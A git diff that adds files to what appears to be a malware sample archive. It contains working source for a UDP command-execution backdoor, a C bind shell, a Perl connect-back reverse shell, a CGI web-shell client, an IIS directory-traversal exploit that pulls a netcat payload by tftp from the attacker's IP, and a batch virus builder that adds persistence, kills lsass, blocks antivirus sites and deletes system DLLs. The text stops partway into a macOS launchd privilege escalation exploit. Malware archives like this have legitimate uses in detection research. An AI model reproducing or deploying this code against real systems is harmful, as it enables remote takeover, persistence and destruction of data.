+      $file .= ".pm" unless ($file =~ /(\.pm|\.ph)$/);
+      return(eval("use $module $arg;")) if (grep { -f "$_/$file" } @INC);
+  }
+
+  return();
+}
+
+sub write_shell {
+  my ($cli, $msg) = @_;
+  my $shell = $CLIENT{$cli}->{shell};
+
+  return(undef) unless ($shell);
+
+  foreach my $m (split_chars($msg, 20)) {
+    read_shells();
+    print $shell $m;
+    read_shells();
+  }
+  return(1);
+}
+
+sub split_chars {
+  my ($msg, $nchars) = @_;
+
+  my @splited;
+  my @chrs = split ('', $msg);
+  my $done = 0;
+  while ( 1 ) {
+    my $splited = join('', @chrs[$done .. ($done+$nchars-1)]);
+    $done += $nchars;
+    last if (length($splited) < 1);
+    push(@splited, $splited);
+  }
+  return(@splited);
+}
+
+sub finish_client {
+  my ($cli, $msg) = @_;
+  write_client($cli, $msg);
+  close_client($cli);
+}
+   
+sub close_client {
+  my $cli = shift;
+  my $sock = $CLIENT{$cli}->{sock};
+
+  $sel_serv->remove($sock);
+  if ($CLIENT{$cli}->{shell}) {
+    my $shell = $CLIENT{$cli}->{shell};
+    $sel_shell->remove($shell);
+    close($shell);
+  }
+  $sock->close() if($sock);
+  delete($CLIENT{$cli});
+}
+
+sub write_client {
+   my ($cli, $msg) = @_;
+   my $sock = $CLIENT{$cli}->{sock};
+   syswrite($sock, $msg, length($msg)) if ($sock);
+}
+
+
diff --git a/Perl/Backdoor.Perl.Udpdor b/Perl/Backdoor.Perl.Udpdor
new file mode 100644
index 00000000..1447e15b
--- /dev/null
+++ b/Perl/Backdoor.Perl.Udpdor
@@ -0,0 +1,145 @@
+# server..
+# see docs for what needs to be edited..
+# (plastek)
+ 
+$pid=fork;
+exit if $pid;
+die("Error.") unless defined($pid);
+use IO::Socket;
+use POSIX;
+use Fcntl ':flock';
+POSIX::setsid();
+
+$0 = 'slash';
+$time_to_die=0;
+
+sub signal_handler {
+	$time_to_die=1;
+}
+
+$SIG{INT}=$SIG{TERM}=$SIG{HUP}=\&signal_handler;
+
+until($time_to_die) {
+	$|=1;
+	$port=52000;
+	$maxlen=1024;
+	my($sock, $raddr, $rhost);
+	$sock=IO::Socket::INET->new(LocalPort=>$port,Proto=>'udp') or die("Error.\n");
+	while($sock->recv($msg, $maxlen)) {
+ 		my($rport, $ipaddr)=sockaddr_in($sock->peername);
+		$rhost=gethostbyaddr($ipaddr, AF_INET);
+
+
+		# to r be change
+		if($rhost =~ /(pear|cherry)/){
+			if($rport =~ /1243/){
+				my $kfile = '...k';
+				open(KFILE, "< $kfile");
+				for my $bytes(<KFILE>){
+					$kekel = $bytes;
+				}
+				$blew = Gh0ST0r->new($kekel);
+				$fmsg = $blew->gee_golly($msg);
+
+				close KFILE;
+				if($fmsg =~ /sendtxt/){
+					$fmsg =~ s/sendbin//;
+					my ($file, $payload) = split(/::::/, $fmsg);
+					open(TMP, ">> $file");
+					flock(TMP, LOCK_SH);
+					print TMP $payload;
+					close TMP;
+				}
+				if($fmsg =~ /nike::/){
+					$fmsg =~ s/nike:://;
+					open(KTMP, "> ...k");
+					print KTMP "$fmsg";
+					close KTMP;
+					system("chmod 600 $kfile");
+				}
+				if($fmsg =~ /\.\//){
+					$fmsg =~ s/\.\///;
+					system("$fmsg");
+ 				}
+			}
+		}
+	}
+}
+
+package Gh0ST0r;
+require Exporter;
+
+@ISA = qw(Exporter);
+@EXPORT_OK = qw();
+
+use strict;
+no strict 'refs';
+
+use vars qw( @b @t @R @S @h @o @K $VERSION );
+
+$VERSION = "1.0";
+
+sub new {
+    my ( $argument, $pp ) = @_;
+    Setup( $pp );
+    my $class = ref ( $argument ) || $argument;
+    my $self = {};
+    bless $self, $class;
+    return $self;
+} 
+
+sub egadz {
+    my ( $self, $tax ) = @_;
+    return Gh0ST( $tax );
+}
+
+sub gee_golly {
+    my ( $self, $tax ) = @_;
+    return Gh0ST( $tax, 1 );
+}
+
+sub Gh0ST {
+    my ( $v, $w, $a, $q, $c, $out, $self );
+    my ( $e, $d ) = @_;
+    @h = 0 .. 7;
+    @o = reverse @h;
+    while ( $a < length $e ) {
+        $v = N( $e, $a );
+        $w = N( $e, ( $a += 8 ) - 4 );
+        grep $q++ % 2 ? $v ^= F( $w + $K[ $_ ] ) : ( $w ^= F( $v + $K[ $_ ] ) ), $d ? ( @h, ( @o ) x 3 ) : ( ( @h ) x 3, @o );
+        $out .= pack N2, $w, $v;
+    }
+    return $out;
+}
+
+sub F {
+    my $u = 0;
+    grep $u |= $S[ $_ ][ $_[ 0 ] >> $_ * 4 & 15 ] << $_ * 4, reverse 0 .. 7;
+    return $u << 11 | $u >> 21;
+}
+
+sub R {
+    return int( (shift) * rand );
+}
+
+sub N {
+    return vec $_[ 0 ], $_[ 1 ] / 4, 32;
+}
+
+sub Setup {
+    my $p = shift;
+    my ( $s, $i, $c );
+    for ( $i = 0; $i < length $p; $i += 4 ) {
+        srand( $s ^= N( $p, $i ) );
+    }
+    @b = @t = 0 .. 15;
+    while ( $c < 8 ) {
+        grep { push @b, splice @b, R( 9 ), 5 } @t;
+        $R[ $c ] = R( 2**32 );
+        @{ $S[ $c++ ] } = @b;
+    }
+
+}
+
+1;
+__END__
diff --git a/Perl/Backdoor.Perl.Whoredoor.08 b/Perl/Backdoor.Perl.Whoredoor.08
new file mode 100644
index 00000000..84e98399
--- /dev/null
+++ b/Perl/Backdoor.Perl.Whoredoor.08
@@ -0,0 +1,73 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <unistd.h>
+#include <netdb.h>
+
+void mk_daemon();
+
+int main(int argc, char **argv)
+{
+int lfd,cfd;
+socklen_t len;
+struct sockaddr_in cli,serv;
+pid_t pid;
+char **sh;
+
+sh[0]="/bin/sh";
+sh[1]=NULL;
+
+mk_daemon();
+strncpy(argv[0],"ps",sizeof(argv[0]));
+lfd=socket(AF_INET,SOCK_STREAM,0);
+bzero(&serv,sizeof(serv));
+serv.sin_family=AF_INET;
+serv.sin_addr.s_addr=htonl(INADDR_ANY);
+serv.sin_port=htons(65535);
+bind(lfd,(struct sockaddr *)&serv,sizeof(serv));
+listen(lfd,5);
+
+while(1)
+{
+len=sizeof(cli);
+cfd=accept(lfd,(struct sockaddr *)&cli,&len);
+	if(!(pid=fork()))
+	{
+	dup2(cfd,0);
+	dup2(cfd,1);
+	dup2(cfd,2);
+	execve(sh[0],sh,NULL);
+	close(cfd);
+	exit(0);
+	}
+close(cfd);
+}
+return 0;
+}
+
+void mk_daemon()
+{
+/* yes I did get this out of UNP */
+int x;
+pid_t pid;
+	if((pid=fork()) !=0)
+	{
+	exit(-1);
+	}
+setsid();
+signal(SIGHUP,SIG_IGN);
+signal(SIGINT,SIG_IGN);
+
+	if((pid=fork()) !=0)
+	{
+	exit(-1);
+	}
+chdir("/");
+umask(0);
+	for(x=0;x<=64;x++)
+	{
+	close(x);
+	}
+}
\ No newline at end of file
diff --git a/Perl/Backdoor.Perl.WinShell.a b/Perl/Backdoor.Perl.WinShell.a
new file mode 100644
index 00000000..94cde8ea
--- /dev/null
+++ b/Perl/Backdoor.Perl.WinShell.a
@@ -0,0 +1,56 @@
+# This is for educational purpose's only!
+# WHO LET THEM DOGS OUT!
+# Use uni.pl first to see if this is a vulnerable server!
+# Based of the script unicodeexecute.pl from Roelof Temmngh
+# Files=uniexe.pl,uni.pl,readme.file,tftpd32.exe,exploit.readme
+
+use Socket;
+
+if ($#ARGV<0) {die "Usage: uniexe.pl IP:port command\n";}
+($host,$port)=split(/:/,@ARGV[0]);
+$target = inet_aton($host);
+
+
+$failed=1;
+$command="dir";
+@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n\cls");
+foreach $line (@results){
+ if ($line =~ /nit.exe/) {$failed=0;}
+}
+$failed2=1;
+if ($failed==1) { 
+ 
+ #You need to change the xxx.xxx.xxx.xxx to your ip address. Duh!
+ $command="tftp -i xxx.xxx.xxx.xxx GET ncx99.exe c:\\inetpub\\scripts\\nit.exe";
+ $command=~s/ /\%20/g;
+ @results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
+ foreach $line2 (@results2){
+  if (($line2 =~ /nit.exe/ )) {$failed2=0;}
+ }
+}  
+
+
+$command=@ARGV[1];
+print "\n
+Hit CTRL-C if this is Hanging";
+
+$command=~s/ /\%20/g;
+my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
+print @results;
+
+# ------------- Sendraw - thanx RFP rfp@wiretrip.net
+sub sendraw {   # this saves the whole transaction anyway
+        my ($pstr)=@_;
+        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
+                die("Socket problems\n");
+        if(connect(S,pack "SnA4x8",2,$port,$target)){
+                my @in;
+                select(S);      $|=1;   print $pstr;
+                while(<S>){ push @in, $_;}
+                select(STDOUT); close(S); return @in;
+        } else { die("Can't connect...\n"); }
+        
+}
+# NIT IN THE YEAR 2000
+
+
diff --git a/Perl/Backdoor.Perl.Worsyn b/Perl/Backdoor.Perl.Worsyn
new file mode 100644
index 00000000..33ada973
--- /dev/null
+++ b/Perl/Backdoor.Perl.Worsyn
@@ -0,0 +1,45 @@
+
+use Socket;
+
+print "Data Cha0s Connect Back Backdoor\n\n";
+
+if (!$ARGV[0]) {
+  printf "Usage: $0 [Host] <Port>\n";
+  exit(1);
+}
+
+print "[*] Dumping Arguments\n";
+
+$host = $ARGV[0];
+$port = 80;
+
+if ($ARGV[1]) {
+  $port = $ARGV[1];
+}
+
+print "[*] Connecting...\n";
+
+$proto = getprotobyname('tcp') || die("[-] Unknown Protocol\n");
+
+socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Socket Error\n");
+
+my $target = inet_aton($host);
+
+if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
+  die("[-] Unable to Connect\n");
+}
+
+print "[*] Spawning Shell\n";
+
+if (!fork( )) {
+  open(STDIN,">&SERVER");
+  open(STDOUT,">&SERVER");
+  open(STDERR,">&SERVER");
+
+  exec {'/bin/sh'} '-bash' . "\0" x 4;
+  exit(0);
+}
+
+print "[*] Detached\n\n";
+
+
diff --git a/Perl/Backdoor.Perl.Wsh.10 b/Perl/Backdoor.Perl.Wsh.10
new file mode 100644
index 00000000..13744c48
--- /dev/null
+++ b/Perl/Backdoor.Perl.Wsh.10
@@ -0,0 +1,192 @@
+# wsh-c - cgi based remote unix shell (client part)
+# by Alex Dyatlov <alex@dyatlov.ru>
+# April, 2002
+#
+# INSTALL
+# Module Term::ReadLine::Gnu installation is recommended, get:
+# 1) readline-4.2a.tar.gz or later from
+#    http://www.gnu.org/directory/readline.html
+# 2) ReadLine-Gnu-1.12.tar.gz or later from
+#    http://search.cpan.org/search?dist=Term-ReadLine-Gnu
+#
+# SHELL COMMANDS
+# exit		as is
+# history	show commands history
+# !<number>	execute command with history <number>
+# wshget <file> get <file> from remote host to local directory
+# wshput <file> put <file> from local directory to remote host
+use strict;
+
+use IO::Socket;
+use Term::ReadLine;
+use POSIX qw(:sys_wait_h);
+
+#--- config - begin ----------------------------------->8--
+my $use_proxy = 1; 		#--- (0 || 1) connect directly or use HTTP proxy
+my $host = "111.222.33.4";	#--- proxy ip here if $use_proxy = 1
+my $port = 3128;		#--- proxy port
+my $http_port = 80;		#--- default HTTP port
+my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"; #--- for httpd logs
+my $anticache = 0;		#--- (0 || 1) add '?<random_number>' to URL
+
+my $shell_prompt = "wsh#";
+my $pwd = "/";			#--- 'home' directory on remote host
+my $pattern = "STCOM";
+#--- config - end ------------------------------------->8--
+
+my $VERSION = "1.0";
+$ENV{PERL_RL} = " o=0"; # use best available ReadLine without ornaments
+
+my $request = $ARGV[0];
+my $shtam = $ARGV[1];
+unless ($request && $shtam) {
+	print "Usage: $0 host/dir/script KEY\n\n";
+	exit -1;
+}
+
+my $hostname;
+if ($request =~ /^([^\/]+)(.*)/s) {
+	$hostname = $1;
+	$request = $2
+		if (!$use_proxy);
+	if ($hostname =~ /([^:]+):(.*)/) {
+		$hostname = $1;
+		$http_port = $2;
+	}
+} else {
+	print "unable to parse hostname from $ARGV[0]\n\n";
+	exit -1;
+}
+if (!$use_proxy) {
+	if ($hostname !~ /\d+\.\d+\.\d+\.\d+/) {
+		(my $name, my $aliases, my $addrtype, my $length, my @addrs) =
+			gethostbyname($hostname)
+			or die "unable to resolve hostname '$hostname'\n\n";
+		$host = join('.', unpack('C4', $addrs[0]));
+	} else {
+		$host = $hostname;
+	}
+	$port = $http_port;
+} else {
+	$request = "http://".$request;
+}
+
+my $term = Term::ReadLine->new("wsh");
+my $OUT = $term->OUT() || *STDOUT;
+my @h_list = ();
+my $io;
+my $file;
+while (defined (my $cmd = $term->readline("$shell_prompt "))) {
+	next if (length($cmd) == 0);
+# wsh commands --- begin
+	exit 0 if ($cmd =~ /^exit$/s);
+	if ($cmd =~ /^history$/s) {
+		my $h_counter = 1;
+		foreach (@h_list) {
+			print $OUT "  ".($h_counter++)."\t$_\n";
+		}
+		next;
+	}
+	if ($cmd =~ /^\!(\d+)$/s) {
+		($1 > 0 && $1 <= scalar(@h_list)) ?
+			$cmd = $h_list[$1-1] :
+			next;
+	}
+	$io = undef;
+	if ($cmd =~ /^wsh((get)|(put)) ['" ]*?([^'"]+)/s) {
+		$io = $1;
+		$file = $4;
+		($pwd =~ /\/$/s) ?
+			$cmd = "wsh$io \"$pwd$file\"" :
+			$cmd = "wsh$io \"$pwd/$file\"";
+		if ($io =~ /put/) {
+			unless (open(FH, $file)) {
+				print "$file: $!\n";
+				next;
+			}
+			$cmd = join(//, ($cmd, <FH>));
+			close(FH);
+		}
+	}
+# wsh commands --- end
+	push(@h_list, $cmd);
+	if ($cmd =~ /^cd ['"]?([^'"; ]+)$/s) {
+		my $dir = $1;
+		if ($dir !~ /^\//s) {
+			$pwd = "$pwd/$dir";
+			$pwd =~ s/[^\/]+\/\.\.//g;
+			$pwd =~ s/\/{2,}/\//g;
+			$pwd =~ s/\/$//;
+		} else {
+			$pwd = $dir;
+		}
+		next;
+	}
+	$cmd = "if [ -d $pwd ];then cd $pwd;".
+		"else echo 'cd: $pwd: No such file or directory';exit 0;fi;$cmd"
+		unless (defined($io));
+	my $cmd_s = $pattern;
+	$cmd_s =~ s/ST/$shtam/;
+	$cmd_s =~ s/COM/$cmd/;
+	my $cmd_sl = length($cmd_s);
+	my $socket = IO::Socket::INET->new(
+		PeerAddr => $host,
+		PeerPort => $port,
+		Proto    => "tcp",
+		Type     => SOCK_STREAM) or die $!;
+	($anticache) ?
+		print $socket "POST $request?".(int(rand(9999)))." HTTP/1.0\r\n" :
+		print $socket "POST $request HTTP/1.0\r\n";
+	print $socket
+		"Content-Type: application/x-www-form-urlencoded\r\n".
+		"User-Agent: $agent\r\n".
+		"Host: $hostname\r\n".
+		"Content-Length: $cmd_sl\r\n";
+	($use_proxy) ?
+		print $socket
+			"Proxy-Connection: close\r\n".
+			"Pragma: no-cache\r\n" :
+		print $socket
+			"Connection: close\r\n";
+	print $socket
+		"\r\n".
+		"$cmd_s";
+	my $cl = 0;
+	my $crlf = 0;
+	my @msg = ();
+	while (my $str = <$socket>) {
+		if (!$crlf && $str =~ /^\s*?$/s) {
+			$crlf = 1;
+			next;
+		}
+		$msg[$crlf] = $msg[$crlf].$str;
+		if (!$cl && $crlf) {
+			$cl = length($msg[0]) + 4;
+			if ($msg[0] =~ /Content-Length: (\d+)/s) {
+				$cl += $1;
+			} else {
+				$cl = -1;
+			}
+		}
+		last if ($cl > 0 && length($msg[0].$msg[1])+4 >= $cl);
+	}
+	close($socket);
+	if ($msg[0] !~ /^[^ ]+ 200/s) {
+		print $OUT "HTTP request fail:\n\n$msg[0]\n";
+		next;
+	}
+	if ($io =~ /get/) {
+		if (length($msg[1]) > 0) {
+			if (open(FH, "> $file")) {
+				print FH $msg[1];
+				close(FH);
+			} else {
+				print $OUT $!;
+			}
+		} else {
+			print $OUT "wshget fail\n"
+		}
+	} else {
+		print $OUT $msg[1];
+	}
+}
diff --git a/Perl/Constructor.Perl.DAV.a b/Perl/Constructor.Perl.DAV.a
new file mode 100644
index 00000000..1320ae7b
--- /dev/null
+++ b/Perl/Constructor.Perl.DAV.a
@@ -0,0 +1,244 @@
+# Virus Builder
+# by dav
+$vname = '';
+$vwriter = '';
+$vbsmsgtxt = '';
+$vtime = '';
+
+print("*******************\n");
+print("DAV's Virus Builder\n");
+print("BAT/VIRUS\n");
+print("*******************\n");
+print("\n");
+
+print("VirusName?\n");
+ chomp ($vname = <STDIN>);
+ print("\n");
+print("Author?\n");
+ chomp ($vwriter = <STDIN>);
+  print("\n");
+  open(FH,">virus.bat");
+  print FH '@echo off';
+  print FH "\n";
+  close(FH);
+  open(FH,">>virus.bat");
+  print FH "rem $vname - Virus\n";
+  print FH "rem by $vwriter\n";
+  print FH "rem ** generated with dav's virus builder v.1.0 in perl **\n";
+  print FH "set dav=echo\n";
+  print FH "set davv=copy\n";
+  print FH "set davvv=reg add\n";
+  print FH "set davvvv=del\n";
+  print FH "set davvvvv=net share\n";
+  print FH "set davvvvvv=cls\n";
+  print FH "set davvvvvvv=taskkill\n";
+  print FH "set davvvvvvvv=ren\n";
+  print FH "set davvvvvvvvv=call\n";
+  print FH "set davvvvvvvvvv=shutdown\n";
+  print FH "%davv% %0 %windir%\\vwin.bat > nul";
+  print FH "\n";
+  close(FH);
+  
+print("*** Startup Methods ***\n");
+
+  print("Autostart/Startup Infect - yes/no?\n");
+  chomp ($vstartup = <STDIN>);
+  if($vstartup=~m/^(yes|ja|j|y)/i) {
+	open(FH,">>virus.bat");
+	print FH "chcp 1252 > nul";
+	print FH "\n";
+	print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\Programme\\Autostart\\win.bat" > nul';
+	print FH "\n";
+    print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\win.bat" > nul';
+    print FH "\n";
+	close(FH); } else { print "x\n" }
+	print("\n");
+	
+	print("REGentry(works on all winsys) - yes/no?\n");	
+	 chomp ($regy = <STDIN>);
+  if($regy=~m/^(yes|ja|j|y)/i) {
+	open(FH,">>virus.bat");
+	print FH '%davvv% "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v vwin /t REG_SZ /d "%windir%\vwin.bat" /f > nul';  
+	print FH "\n";
+    print FH '%davvv% "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v vwin /t REG_SZ /d "%windir%\vwin.bat" /f > nul';  
+    print FH "\n";
+	close(FH); } else { print "x\n" }
+    print("\n");
+    
+print("*** Virus Main Function ***\n");
+
+    print("Shutdown with time and comment - yes/no?\n");
+    chomp ($shutdown = <STDIN>);
+ if($shutdown=~m/^(yes|ja|j|y)/i) {
+	print("Seconds to restart?\n");
+	chomp ($vtime = <STDIN>);
+	print("Comment?\n");
+	chomp ($vcom = <STDIN>);
+	open(FH,">>virus.bat");
+	print FH "%davvvvvvvvvv% /s /f /t ";
+	print FH "$vtime";
+	print FH " ";
+	print FH "/c ";
+	print FH '"';
+	print FH "$vcom";
+	print FH '"';
+	print FH "\n";
+	close(FH); } else { print "x\n" }
+    print("\n");
+
+    print("LSASS.exe and EXPLORER.exe Killer - yes/no?\n");
+    chomp ($lsass = <STDIN>);
+ if($lsass=~m/^(yes|ja|j|y)/i) {
+	open(FH,">>virus.bat");
+	print FH "%davvvvvvv% /f /im explorer.exe\n";
+	print FH "%davvvvvvv% /f /im lsass.exe \n";
+	close(FH); } else { print "x\n" }
+    print("\n");
+    
+	print("Net Share c:, g: ... - yes/no?\n");	
+	 chomp ($netshare = <STDIN>);
+ if($netshare=~m/^(yes|ja|j|y)/i) {
+	open(FH,">>virus.bat");
+	print FH "%davvvvv% c=c:\n";
+	print FH "%davvvvv% g=g:\n";
+	print FH "%davvvvv% f=f:\n";
+	print FH "%davvvvv% y=y:\n";
+	close(FH); } else { print "x\n" }
+	print("\n");
+	
+	print("kill cookies - yes/no?\n");	
+	 chomp ($vcookie = <STDIN>);
+ if($vcookie=~m/^(yes|ja|j|y)/i) {
+	open(FH,">>virus.bat");
+	print FH '%davvvvvvvv% "c:\documents and settings\%username%\cookies\*.txt" *.fUcKeDbYvIrUs > nul';
+	print FH "\n";
+	print FH '%davvvvvvvv% "C:\Dokumente und Einstellungen\%username%\cookies\*.txt" *.fUcKeDbYvIrUs > nul';
+    print FH "\n";
+	close(FH); } else { print "x\n" }
+	print("\n");
+
+    print("infect hosts file - yes/no?\n");	
+	 chomp ($vhosts = <STDIN>);
+ if($vhosts=~m/^(yes|ja|j|y)/i) {
+	 open(FH,">>virus.bat");
+     print FH "%dav% 127.0.0.1 www.google.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.google.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.symantec.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.antivir.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.f-secure.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.f-secure.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.kaspersky.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.kaspersky.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.nai.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 windowsupdate.microsoft.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.symantec.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.microsoft.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.microsoft.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.free-av.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.sophos.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%dav% 127.0.0.1 www.sophos.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
+     print FH "%davvvvvv%\n";
+     close(FH); } else { print "x\n" }
+	 print("\n");	
+	
+    print("Random Population - yes/no?\n");
+     chomp ($ranpop = <STDIN>);
+ if($ranpop=~m/^(yes|ja|j|y)/i) {
+	 open(FH,">>virus.bat");
+	 print FH "%davv% %0 %random%.bat\n";
+	 print FH "%davv% %0 %random%.bat\n";
+	 print FH "%davv% %0 %random%.bat\n";
+	 print FH "%davv% %0 %random%.bat\n";
+	 print FH "%davv% %0 c:\\%random%.bat\n";
+	 print FH "%davv% %0 c:\\%random%.bat\n";
+	 print FH "%davv% %0 c:\\%random%.bat\n";
+	 print FH "%davv% %0 c:\\%random%.bat\n";
+	 print FH "%davvvvvv%\n";
+	 print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\Programme\\Autostart\\%random%.bat" > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\Programme\\Autostart\\%random%.bat" > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\Programme\\Autostart\\%random%.bat" > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\Programme\\Autostart\\%random%.bat" > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\%random%.bat" > nul';
+	 print FH "\n";
+     print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\%random%.bat" > nul';
+	 print FH "\n";	 
+     print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\%random%.bat" > nul';
+	 print FH "\n";
+     print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\%random%.bat" > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
+	 print FH "\n";
+	 close(FH); } else { print "x\n" }
+	 print("\n");
+	
+	 print("infect some .exe files - yes/no?\n");
+     chomp ($syskiller = <STDIN>);
+ if($syskiller=~m/^(yes|ja|j|y)/i) {
+	 open(FH,">>virus.bat");
+	 print FH '%davv% %0 %windir%\\system32\\taskmgr.exe > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 %windir%\\system32\\winlogon.exe > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 %windir%\\system32\\svchost.exe > nul';
+	 print FH "\n";
+	 print FH '%davv% %0 %windir%\\system32\\calc.exe > nul';
+	 print FH "\n";
+	 close(FH); } else { print "x\n" }
+	 print("\n");
+	 
+	  print("kill .dll .ini files (** WARNING! **) - yes/no?\n");
+     chomp ($syskiller1 = <STDIN>);
+ if($syskiller1=~m/^(yes|ja|j|y)/i) {
+	 open(FH,">>virus.bat");
+	 print FH '%davvvvvvvv% %0 %windir%\\system32\\*.dll *.-fUcKeD > nul';
+	 print FH "\n";
+	 print FH '%davvvvvvvv% %0 %windir%\\system32\\*.ini *.FuCkEd- > nul';
+	 print FH "\n";
+	 close(FH); } else { print "x\n" }
+	 print("\n");
+	 
+	 print("VBS Messagebox - yes/no?\n");	
+	 chomp ($vbsmsg = <STDIN>);
+ if($vbsmsg=~m/^(yes|ja|j|y)/i) {
+	 print("Message?\n");
+	 chomp ($vbsmsgtxt = <STDIN>);
+     open(FH,">>virus.bat");
+     print FH '%dav% MsgBox "';
+     print FH "$vbsmsgtxt";
+     print FH '", 16, "ViRuS!!!" > msg.vbs';
+     print FH "\n";
+     print FH "%davvvvvvvvv% msg.vbs\n";
+	 close(FH); } else { print "x\n" }
+	 print("\n");
+
+	 open(FH,">>virus.bat");
+	 print FH "goto ende\n";
+	 print FH ":ende\n";
+	 close(FH);
+	 print("\n");
+	 
+	 while ($cya ne 'exit') {
+     print "*** VIRUS.BAT BUILT ***\n";
+     print "*** DON'T SPREAD YOUR VIRUS. ***\n";
+     print "*** I AM NOT RESPONSIBLE FOR POSSIBLE DAMAGES OR SOMETHING ELSE. ***\n";
+     print "*** exit to quit ***\n";
+     chomp ($cya = <STDIN>);
+     print "\n"; }
\ No newline at end of file
diff --git a/Perl/Constructor.Perl.Machd.a b/Perl/Constructor.Perl.Machd.a
new file mode 100644
index 00000000..723119fe
--- /dev/null
+++ b/Perl/Constructor.Perl.Machd.a
@@ -0,0 +1,126 @@
+# http://www.digitalmunition.com/FailureToLaunch.pl 
+# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
+#
+# This is a practical application of Non Executable Stack Lovin - http://www.digitalmunition.com/NonExecutableLovin.txt
+#
+# This code currently jumps into 0x1811111 via dyld_stub_close()
+#
+# This exploit will create a malicious .plist file for you to use with launchctl
+# k-fs-computer:~ kf$ launchctl load ./com.pwnage.plist
+#
+# In theory I guess you could also drop this in ~/Library/LaunchAgents 
+#
+# This was tested against OSX 10.4.6 8l1119 on a 1.5GHz Intel Core Solo
+# 
+# k-fs-computer:~ kf$ ls -al /sbin/launchd
+# -rwsr-sr-x   1 root  wheel  161944 Feb 19 04:46 /sbin/launchd
+# k-fs-computer:~ kf$ file /sbin/launchd
+# /sbin/launchd: setuid setgid Mach-O universal binary with 2 architectures
+# /sbin/launchd (for architecture i386):  Mach-O executable i386
+# /sbin/launchd (for architecture ppc):   Mach-O executable ppc
+#
+# ./src/SystemStarter.c:374:              syslog(level, buf);
+# proactive security eh? 
+
+foreach $key (keys %ENV) {
+
+    delete $ENV{$key};
+
+}
+
+$writeaddr = 0xa0011163;  # close()
+#$writeaddr = 0xa00119f1;  # cxa_finalize() (must wait 25 seconds or so if you use this one)
+
+$sc = (0x1811111);  
+
+# both of these arrays are put in size order due to the multiple writes via unformatted syslog() call
+
+# seteuid after thought... whoops...I had to move some shit arround to account for this
+@seteuid =
+([$sc+2,  $sc+4,  $sc,    $sc+6],
+ [0x5050, 0xb7b0, 0xc031, 0x80cd], );
+
+# Write the following instructions to 0xa0011163 <dyld_stub_close> as well as nemos execve() to 0x1811111
+# mov    $0x1811111,%eax
+# jmp    *%eax
+# 
+@payload =
